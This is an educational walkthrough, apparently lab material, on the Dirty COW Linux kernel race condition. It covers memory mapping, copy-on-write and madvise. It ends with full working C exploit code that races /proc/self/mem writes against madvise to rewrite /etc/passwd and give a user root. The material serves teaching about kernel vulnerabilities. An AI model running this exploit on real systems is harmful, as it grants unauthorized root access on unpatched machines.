# Dirty COW Vulnerabilities

The Dirty COW race condition is a Linux kernel bug that was first discovered and exploited in 2016. The bug had been latent in the Linux kernel for 9 years before its disclosure. The exploit allows attackers to modify any protected file, even if they only have read access to it.

### Memory Mapping 
`mmap()` is a POSIX-compliant system call that maps files or devices into memory. The default mapping type is a file-backed mapping, which maps an area of a process's virtual memory to a file; reading from the mapped area causes the file to be read.
```c
#include <stdio.h>
#include <string.h>
#include <fcntl.h>
#include <unistd.h>
#include <sys/mman.h>
#include <sys/stat.h>

// assumes ./zzz exists and is at least 16 bytes long
int main(void)
{
    struct stat st;
    char content[20];
    char *new_content = "New Content";
    char *map;

    int f = open("./zzz", O_RDWR);
    fstat(f, &st);
    // map the entire file into memory
    map = mmap(NULL, st.st_size, PROT_READ | PROT_WRITE, MAP_SHARED, f, 0);
    if (map == MAP_FAILED) {
        perror("mmap");
        return 1;
    }

    // read 10 bytes from the file via the mapped memory
    memcpy((void*) content, map, 10);
    content[10] = '\0';   // memcpy does not terminate the string
    printf("read: %s\n", content);

    // write to the file via the mapped memory, starting at offset 5
    memcpy(map+5, new_content, strlen(new_content));

    // clean up
    munmap(map, st.st_size);
    close(f);
    return 0;
}
```
#### Explanation of lines:
`map = mmap(NULL, st.st_size, PROT_READ | PROT_WRITE, MAP_SHARED, f, 0); `
* The first argument specifies the starting address of the mapped memory; `NULL` means the kernel picks it.
* The second argument specifies the size of the mapped memory.
* The third argument specifies whether the memory is readable and/or writable. It should be compatible with the access mode used in the preceding `open()` system call.
* The fourth argument determines whether an update to the mapping is visible to other processes mapping the same region, and whether the update is carried through to the underlying file. `MAP_SHARED` means it is, whereas `MAP_PRIVATE` means it is not.
* The fifth argument specifies the file that needs to be mapped.
* The sixth argument specifies an offset, indicating where inside the file the mapping should start.

`memcpy((void*)content, map, 10);` <br>
`memcpy(map+5, new_content, strlen(new_content));`
* Once the mapping is created, we can access the memory region instead of accessing the file directly.
* To read from the file, we pass the mapped memory as the source (second argument) of `memcpy()` and our buffer as the destination (first argument).
* To write to the file, we pass the mapped memory as the destination (first argument) and our buffer as the source (second argument).

A common use of memory mapping is interprocess communication. Processes sometimes have to share the same memory, and the mapped memory behaves like shared memory between two processes.

#### MAP_SHARED, MAP_PRIVATE and Copy on Write 
The `mmap()` system call:
* creates a new mapping in the virtual address space of the calling process
* when used on a file, causes the file content to be loaded into physical memory
* maps that physical memory into the process's virtual memory, typically through paging.

When multiple processes map the same file into memory, they can map it to different virtual memory addresses, but the physical memory that holds the file content is the same. <br>
* If the `MAP_SHARED` flag is on, a write to the mapped memory also updates the physical memory and is visible to other processes.
* If the `MAP_PRIVATE` flag is on, the file is mapped to memory private to the calling process, so changes are not visible to other processes, nor are they carried through to the underlying file (at the physical memory level). In effect, the calling process has a _private copy_ of the file in its virtual memory.
    * The content of the file needs to be copied into the private memory region, but the copy is often delayed until it is needed.
    * Therefore, memory mapped with `MAP_PRIVATE` initially still points to the original physical memory.
    * The private copy is made only when the process needs to write to the memory, at which point the OS kernel allocates new physical memory for it.
    * The OS then updates the page table of the process, so that the mapped virtual memory points to the new physical memory (the private copy), and any subsequent read or write is redirected to that location.
![map](./image_files/MAP.png)

#### Copy on Write
__COW (Copy on Write)__ is the behavior described above. It is an optimization technique that allows virtual pages of memory in different processes to map to the same physical memory pages if they have identical content. <br>
COW is widely used in modern operating systems. Another example is the `fork()` system call, where the child process starts with a copy of the parent process's memory.
* Copying is time-consuming, so the OS often delays it until it is absolutely necessary (procrastination).
* The OS lets the child process share the parent process's memory by making their page table entries point to the same physical memory.
* The page table entries for both processes are normally set to read-only to prevent writing to the shared memory.
* When one process tries to write to the memory, an exception is raised, and the OS allocates new physical memory for the child process: it copies the contents from the parent process and changes the child's page table, so that each process's page table points to its own private copy of the memory.


#### Discard the Copied Memory 
After a program gets its private copy of the mapped memory, it can use a system call `madvise()` to further advise the kernel regarding the memory. The system call is defined as:
```c
int madvise(void *addr, size_t length, int advice); 
```
It gives advice or directions to the kernel about the memory from address `addr` to `addr + length`. The Dirty COW attack uses the `MADV_DONTNEED` advice. With this advice, we tell the kernel that we no longer need the specified address range, and the kernel frees the resources associated with it. <br>
However, if the pages we discard originally belonged to a mapped memory region, then after `madvise()` with the `MADV_DONTNEED` advice, the process's page table points back to the original physical memory. <br>
This opens up a vulnerability, because the process may still be able to write to that physical memory.

### A Read-only Scenario 
The following is a well-defined copy-on-write scenario. <br>
Suppose we have a read-only file: it can only be opened with the `O_RDONLY` flag and mapped with the `PROT_READ` flag, so it cannot be written with `memcpy()`. However, in Linux, if the file is mapped using `MAP_PRIVATE`, the OS makes an exception and lets the process write to the mapped memory with the `write()` system call on `/proc/self/mem`, which is theoretically safe since the write goes to the private copy.

```c
#include <stdio.h>
#include <sys/mman.h>
#include <sys/stat.h>
#include <fcntl.h>
#include <unistd.h>
#include <string.h>

// assumes /zzz is a read-only file that is at least 29 bytes long
int main(int argc, char** argv)
{
    char *content = "**New Content**";
    char buffer[30];
    struct stat st;
    void *map;

    int f = open("/zzz", O_RDONLY);
    fstat(f, &st);
    map = mmap(NULL, st.st_size, PROT_READ, MAP_PRIVATE, f, 0); // MAP_PRIVATE flag on

    // open the process's memory pseudo-file
    int fm = open("/proc/self/mem", O_RDWR);

    // seek to offset 5 of the mapped memory
    lseek(fm, (off_t) map + 5, SEEK_SET);

    // write to the memory
    write(fm, content, strlen(content));

    // check whether the write is successful
    memcpy(buffer, map, 29);
    buffer[29] = '\0';   // terminate the string before printing
    printf("Content after write: %s\n", buffer);

    // check contents after madvise
    madvise(map, st.st_size, MADV_DONTNEED);
    memcpy(buffer, map, 29);
    buffer[29] = '\0';
    printf("Content after madvise: %s\n", buffer);
    return 0;
}

```

The write goes only to the private copy of the mapped memory, not to the original mapped memory. When we run the program, the first print statement therefore shows the modified content. After the `madvise()` call, the second print statement shows the content of the file, which is unchanged. This shows that after `madvise()` with the `MADV_DONTNEED` advice, the private copy is discarded and the page table points back to the original mapped memory (the physical memory that holds the file).

### Dirty COW Exploit 

In the above scenario, we have shown that `write()` can be used to write to the mapped memory. For copy-on-write memory, the system call has to perform three essential steps:
* make a copy of the mapped memory
* update the page table, so that the virtual memory now points to the newly created physical memory
* write to the memory

These three steps are not atomic and may cause race conditions: the execution of one step may be interrupted by other threads or processes. If, for example, `madvise()` with the `MADV_DONTNEED` advice runs between steps 2 and 3, the private copy of the mapped memory is discarded and the page table points back to the original mapped memory. The write in step 3 then goes directly to the physical memory holding the file content, which results in a write to the read-only file. <br>
![COW](./image_files/COW.png)
The `write()` system call checks the protection of the mapped memory at the beginning, but only at the beginning. After the copy is made and the page table is updated, it does not check again. If `write()` checked again in the third step, the problem could be avoided. <br>
For the exploit, therefore, we need two threads:
* one trying to write to the mapped memory via `write()`
* the other trying to discard the private copy of the mapped memory using `madvise()`

If the execution order turns out as shown in the figure above (`madvise()` between Step B and Step C, that is, between the page table update and the write), the race condition is triggered.

### Step 1: Selecting /etc/passwd as Target File
The goal is to change the current user's UID to 0, which represents root privilege.
Suppose the current user is `testcow`.
```
cat /etc/passwd | grep testcow 
```

### Step 2: Set up Memory Mapping and Threads 
We first need to map the target file into memory, and then create the two threads described above to try to trigger the race condition.

```c
#include <stdint.h>
#include <string.h>
#include <fcntl.h>
#include <unistd.h>
#include <pthread.h>
#include <sys/mman.h>
#include <sys/stat.h>

void *map;

// thread one: write thread
// tries to replace testcow:x:1001 with testcow:x:0000
void *writeThread(void *arg)
{
    char *content = "testcow:x:0000";
    // arg is the address of the target string inside the mapping
    off_t offset = (off_t)(uintptr_t) arg;
    int f = open("/proc/self/mem", O_RDWR);
    while (1) {
        // move the file pointer to the corresponding position
        lseek(f, offset, SEEK_SET);
        write(f, content, strlen(content));
    }
}

// thread two: madvise thread
// repeatedly discards the private copy of the mapped memory
void *madviseThread(void *arg)
{
    size_t file_size = (size_t)(uintptr_t) arg;
    while (1) {
        madvise(map, file_size, MADV_DONTNEED);
    }
}

// main thread
int main(int argc, char** argv)
{
    pthread_t pth1, pth2;
    struct stat st;
    size_t file_size;

    int f = open("/etc/passwd", O_RDONLY);

    fstat(f, &st);
    file_size = st.st_size;
    map = mmap(NULL, file_size, PROT_READ, MAP_PRIVATE, f, 0);

    // locate the entry to overwrite; stop if the user is not found
    char *position = strstr(map, "testcow:x:1001");
    if (position == NULL)
        return 1;

    // run the two threads in parallel
    pthread_create(&pth1, NULL, madviseThread, (void *)(uintptr_t) file_size);
    pthread_create(&pth2, NULL, writeThread, position);

    // wait for the threads (they loop until the program is interrupted)
    pthread_join(pth1, NULL);
    pthread_join(pth2, NULL);
    return 0;
}
```

To check whether the attack has succeeded, press `Ctrl-C` to terminate the program after several seconds and view the content of the passwd file. A successful exploit makes user `testcow` a root-privileged user.

__This vulnerability has already been fixed in the Linux kernel__.
However, the more recent __Spectre__ and __Meltdown__ exploits against Intel chips show that __plenty of exploits stem from performance-oriented design decisions__. Linux copy-on-write and Intel's out-of-order execution are both mechanisms that either delay or advance an event; I think this leaves room for further zero-day exploits against such systems.